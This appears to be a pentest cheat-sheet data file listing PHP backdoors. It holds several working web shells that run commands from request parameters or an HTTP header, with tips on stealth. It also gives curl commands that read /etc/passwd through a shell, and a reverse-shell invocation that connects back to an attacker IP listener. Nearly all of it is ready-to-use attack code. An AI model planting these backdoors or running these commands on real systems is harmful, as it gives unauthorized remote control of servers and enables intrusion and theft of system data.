title = "PHP simple backdoors"
description = ""
tags = ["linux", "backdoor", "php"]
source = ["https://github.com/Nickguitar/YAPS"]

[[data]]
description = "Web PHP backdoor. Put it on some .php file and run it making a request with the parameter 'x'. Works with both GET and POST (POST is stealthier):"
language = "php"
command = """<?php shell_exec($_REQUEST['x']);"""

[[data]]
description = "Web PHP backdoor (even stealthier):"
language = "php"
command = """#Run commands with
# curl -H "x:ls -la" example.com/backdoor.php
# curl -H "x:cat /etc/passwd" example.com/backdoor.php
<?php echo shell_exec($_SERVER['HTTP_X']);?>"""

[[data]]
description = "Tiniest PHP backdoor possible:"
language = "php"
command = """#Run commands with example.com/backdoor.php?0=whoami
<?=`$_GET[0]`?>"""

[[data]]
description = "'Functionless' PHP backdoors:"
language = "php"
command = """#Run commands with example.com/backdoor.php?0=system&1=whoami
<?=$_GET[0]($_GET[1])?>

#Run commands with example.com/backdoor.php?f=system&c=whoami
<?=@extract($_REQUEST);@die($f($c))?>"""


[[data]]
description = "YAPS (the most complete PHP reverse shell)"
language = "bash"
command = """#Upload it to the target machine
#https://github.com/Nickguitar/YAPS/raw/main/yaps.php
#Set up a listener on <PORT> and run on the attacker's machine:
curl -x POST -d "x=<ATTACKER IP>:<PORT>" example.com/yaps.php

#If you got access with the previous backdoors (will keep your IP on webserver logs):
#Access example.com/backdoor.php?0=php+yaps.php+<ATTACKER IP>+<PORT>"""
